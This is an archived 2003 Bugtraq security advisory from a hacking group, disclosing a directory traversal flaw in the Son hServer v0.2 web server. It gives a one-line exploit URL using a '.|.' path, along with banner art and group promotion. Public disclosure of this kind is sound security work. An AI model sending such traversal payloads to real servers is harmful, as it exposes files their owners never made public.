[<prev] [next>] [day] [month] [year] [list]
Message-ID: <212255192.20030529161050@mail.ru>
Date: Thu, 29 May 2003 16:10:50 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: Son hServer v0.2: directory traversal
-----BEGIN PGP SIGNED MESSAGE-----
################################################################
# _____ __ __ ___ #
# ........\ \.| |.| |/ \........ #
# : / \| | | | __> : #
# : / _ \ |_| | / __ : #
# : / / \ | <_/ \ : #
# :..../ _/ / _ | ` \....: #
# : \_________/__| |__|_______/ : #
# : Damage Hacking Group : #
# : Security Advisory : #
# :.............................: #
# #
# http://www.dhgroup.org #
#b d#
##b,________________________________________________________.d##
| |
Product: Son hServer v0.2
Authors: super-m.narod.ru
| Vulnerability: directory traversal |
#--------------------------------------------------------------#
| Overview: |
~~~~~~~~~
Small russian http server
| |
#--------------------------------------------------------------#
| Problem: |
~~~~~~~~
This server doesn't filter the "|" (slash) symbol.
| |
#--------------------------------------------------------------#
| Exploit: |
~~~~~~~~
Type in your browser: "http://[server]/.|./" and enjoy ;)
| |
#--------------------------------------------------------------#
| :wow: |
www.dhgroup.org -=> opened English version! Come on in :)
~~~
NeKr0 /DHG www.dhgroup.org
| |
#______________________________________________________________#
\___________________________da_end___________________________/
Best regards www.dhgroup.org
D4rkGr3y icq 540981
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQCVAwUBPtaTcm4LIpseSJmPAQGULAP8Cwy21KIFzkUd+OxQBkO8cReTtn2xLo/k
r/N6wSvMCXk3LKqrLAh+pdHXt76rqX9zI5z2nwrV8P05S4DYtlFSGPDMiCFEyQ/u
LZwRs6HiuF3A0DBph9AXAJEfNZfUsX9M619kLk1RTK22T0GqcsPG+fZCh8RBdCBp
/zIvGD+T5gc=
=it5C
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists